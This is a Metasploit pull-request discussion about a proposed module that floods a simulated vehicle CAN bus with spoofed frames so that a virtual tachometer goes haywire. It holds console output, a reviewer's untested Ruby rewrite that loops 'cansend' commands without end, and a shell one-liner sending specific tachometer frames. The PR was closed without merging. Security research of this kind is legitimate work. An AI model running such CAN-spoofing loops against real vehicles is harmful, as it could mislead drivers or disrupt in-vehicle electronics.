Add CrazyTachymeter, exploit for CAN-Bus.
rapid7/metasploit-framework pull request #10127
Opened 2018-06-01 20:49 UTC by pietrobiondi

## Description
Crazy-Tachymeter is an exploit that allows you to flood the CAN-Bus with frames of the ECU mapping file. This exploit that upsets a simulated tachymeter.
## What do you need
I have simulated a remote scenario like this:
1) CAN simulator installed. You also need a vulnerable server for remote command execution.
2) Crazy Tachymeter exploit on MSF.
3) Make sure the machines are connected each other.

**_I created a Github project that includes the vulnerable virtual machine for testing the exploit._** [[Link]](https://github.com/pietrobiondi/Crazy-Tachymeter)

## Verification
- [ ] Start `msfconsole`
- [ ] `use exploit/unix/misc/crazytachymeter`
- [ ] set RHOST x.x.x.x
- [ ] set RPORT xxxx
- [ ] exploit
## Output msfconsole
```
msf > use exploit/unix/misc/crazytachymeter 
msf exploit(unix/misc/crazytachymeter) > show options 

Module options (exploit/unix/misc/crazytachymeter):

   Name     Current Setting                                                          Required  Description
   ----     ---------------                                                          --------  -----------
   FILEMAP  /usr/share/metasploit-framework/data/wordlists/controlUnitMapCanBus.txt  yes       Path to FILEMAP
   RHOST                                                                             yes       The target address
   RPORT    4444                                                                     yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(unix/misc/crazytachymeter) > set RHOST 10.0.2.7
RHOST => 10.0.2.7
msf exploit(unix/misc/crazytachymeter) > exploit 

[*] Started reverse TCP double handler on 10.0.2.4:4444 
[*] 10.0.2.7:4444 - Connected to 10.0.2.7:4444...
[*] 10.0.2.7:4444 -  -- OPENING CONTROL UNIT MAP --
[*] 10.0.2.7:4444 -  -- Flooding -- 
```

Here you can see the effect of the exploit.
[Maxspeed-Tachymeter](https://raw.githubusercontent.com/pietrobiondi/Crazy-Tachymeter/master/img/maxspeed.png)

2018-06-02 05:08 UTC, bcoles commented
Is 240 MPH fast enough to make the Kessel Run in less than twelve parsecs?

2018-06-02 05:12 UTC, bcoles commented
This module belongs in the `modules/auxiliary` directory as it does not return a session.

2018-06-02 05:21 UTC, bcoles requested changes
This module should be moved to the `auxiliary` directory as it doesn't return a session. Perhaps somewhere in `modules/auxiliary/spoof/`.

This will also require a few changes to conform with Auxiliary module format, such as changing the module `class` and the mixins, and changing some of the module metadata, like removing `Payload` and `Targets`.

2018-06-02 09:46 UTC, pietrobiondi commented on modules/exploits/unix/misc/crazytachymeter.rb
> +      Opt::RPORT(4444),
No, my bad sorry.  It's the port where the server is listening that allows the remote command execution. I'm fixing it.

2018-06-02 09:46 UTC, pietrobiondi commented on modules/exploits/unix/misc/crazytachymeter.rb
> +      OptString.new('FILEMAP', [true, 'Path to FILEMAP', '/usr/share/metasploit-framework/data/wordlists/controlUnitMapCanBus.txt'])
Ok now i fix with "Msf::Config.data_directory". Thanks

2018-06-02 09:50 UTC, pietrobiondi commented on modules/exploits/unix/misc/crazytachymeter.rb
> +      Opt::RPORT(4444),
@bcoles can I put the module in /spoof /replay?
Because I do not know where to put it otherwise.

2018-06-02 09:55 UTC, pietrobiondi commented on modules/exploits/unix/misc/crazytachymeter.rb
> +        cmd = 'cansend vcan0 ' + "#{e}"
Yes, better to make it an option. It indicates the CAN interface of the operating system.

2018-06-02 11:27 UTC, pietrobiondi reviewed
I think I've fixed everything. Let me know.

Thanks.

2018-06-03 06:28 UTC, bcoles commented
Upon closer inspection, it appears you're exploiting a vulnerability in a non-standard service you've created for demonstration purposes.

Unless I misunderstand, it's incredibly unlikely that a vulnerable service exists in the exact same fashion as your demonstration server.

In which case, the module should be a `post` module, rather than an `auxiliary` module, as the typical use case relies on using an existing session.

The module should probably live with the other automotive related exploits, in `modules/post/hardware/automotive/`.

Apologies for the confusion - it wasn't immediately obvious that the command execution was unrelated.

Fortunately, converting the module to a post module is pretty easy.

Basically:

* Change the module `class` to `Msf::Post`
* Remove everything related to sockets and connections, in particular:
  * drop the `OptInt.new('RPORT', [ true, 'The target port']),` option
  * remove the `Msf::Exploit::Remote::Tcp` mixin
* change the `sock.put(cmd)` to `cmd_exec(cmd)`

You may need to play around with `cmd_exec` to ensure it's operating as expected.

To make up for making you rewrite this module, twice, I offer the following untested rewrite:


```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Crazy Tachymeter',
      'Description'    => %q{
        With this tool you can flood the CAN-Bus.
        Just pass a file.txt with the control unit map.
      },
      'Author'         => ['Pietro Biondi'],
      'DisclosureDate' => 'May 18 2018',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix'
      )
    )
    register_options [
      OptString.new('INTERFACE', [true, 'Interface of CAN-Bus', 'vcan0']),
      OptString.new('FILEMAP', [true, 'Path to FILEMAP', ::File.join(Msf::Config.data_directory, 'wordlists', 'controlUnitMapCanBus.txt')])
    ]
  end

  def run
    fname = datastore['FILEMAP']
    unless ::File.exist? fname
      print_error "#{fname} does not exist!"
      return
    end

    print_status ' -- OPENING CONTROL UNIT MAP --'
    lines = []
    File.read(fname, 'rb').each_line do |line|
      lines.push(line)
    end

    print_status ' -- Flooding -- '
    lines.each do |line|
        cmd_exec "cansend #{datastore['INTERFACE']} #{line}"
    } while 1
  end
end
```

2018-06-03 09:30 UTC, bcoles commented
It's hard to say without looking at the surrounding code. However it should be quite easy to debug.

Try liberal use of `puts` to ensure the variables are what you think they are.

```ruby
while 1
      lines.each_with_index{
        |e, i|
puts "i: #{i.inspect}"
puts "e: #{e.inspect}"
        cmd = "cansend #{datastore['INTERFACE']} #{e}"
puts "cmd: #{cmd.inspect}"
        cmd_exec(cmd)
      }
end
```

2018-06-03 09:31 UTC, bcoles commented
Also, as the index is never used, `.each` is preferred over `.each_with_index`.

2018-06-03 13:15 UTC, pietrobiondi commented
I fixed the problem with cmd variable.
Now when i use "run" after setting the session on msf the first message is: 
`[!] SESSION may not be compatible with this module.`

I do not know why my last commit did not pass the " Sanity Test Execution"

2018-06-04 06:46 UTC, bcoles commented
Regarding the session type warning, local and post modules require the following meta data:

```ruby
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
```

Note that this may or may not stop the module from producing the warning.

2018-06-04 07:06 UTC, pietrobiondi commented
I added the sessiontype but the warning continues to be there.

2018-06-18 19:39 UTC, pietrobiondi commented
Hi @bcoles , is there any news about it?

2018-09-24 18:08 UTC, pietrobiondi commented
Hi! What should I do to complete the pull request?

2018-09-24 19:19 UTC, wvu-r7 commented
> I added the sessiontype but the warning continues to be there.

What kind of session are you running it on? Also, can you tell me what this post module does that running `cansend` in a loop doesn't do?

2018-09-24 19:36 UTC, wvu-r7 commented
@bcoles: It is much more than `SessionTypes`, which is perhaps why you are seeing discrepancies in modules with more specific requirements.

https://github.com/rapid7/metasploit-framework/blob/6712627a85220c7d7ec53ed7a0558d1ed7ce58c9/lib/msf/core/post_mixin.rb#L136-L185

2018-09-24 19:43 UTC, jmartin-r7 commented
Closing this. Sorry for the delay in review here, I would suggest this was good practice for learning how to write a module and interact with a session but not something that meets the bar for `master` at this time.  

What this accomplishes could be executed on an interactive session with a single line.
```
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > while true; do sessions -C 1 'cansend vcan0 244#0000009999; cansend vcan0 19b#00000F; cansend vcan0 244#0000009999; cansend vcan0 188#030000; cansend vcan0 244#0000009999; cansend vcan0 19b#000010; cansend vcan0 244#0000009999; cansend vcan0 19b#000005; cansend vcan0 244#0000009999'; done
```

2018-09-24 19:43 UTC, closed without merging

2018-09-24 19:59 UTC, wvu-r7 commented
@pietrobiondi: If you can document what vulnerability this is and its value as a module, I would be happy to reopen this, do a once-over, and get it merged.

2018-10-16 14:57 UTC, bcoles commented
@wvu-r7 My understanding is that this module is not an exploit so much as it's a `Post` module which makes use of legitimate functionality to spoof CAN bus messages. In this instance, the hard-coded frames make the tachometer go crazy.

It's the kind of module you'd want to make the needle bounce in tune to music as part of a vehicle's ["victory song"](https://www.youtube.com/watch?v=8aArSn4IhHI), or to play "pranks" on your "friends".

It's my bad for wasting @pietrobiondi 's time here. The initial intention of the module wasn't clear, and there's an arguably fundamental flaw in the implementation. The module makes use of an infinite loop, shoving commands into the session, which will no doubt either bottleneck locally or saturate the network connection.

One alternative would be to implement a `sleep`. Another would be to send a shell script loop as the command, with a user-configurable number of iterations. Another would be to add module `ACTION` to start and stop the spoofing, by writing a shell script to disk and executing it.

Each approach has their drawbacks, with the latter approach potentially resulting in infinite spoofing in the event that the session is lost before the `STOP` command can be issued.

```¯\_(ツ)_/¯```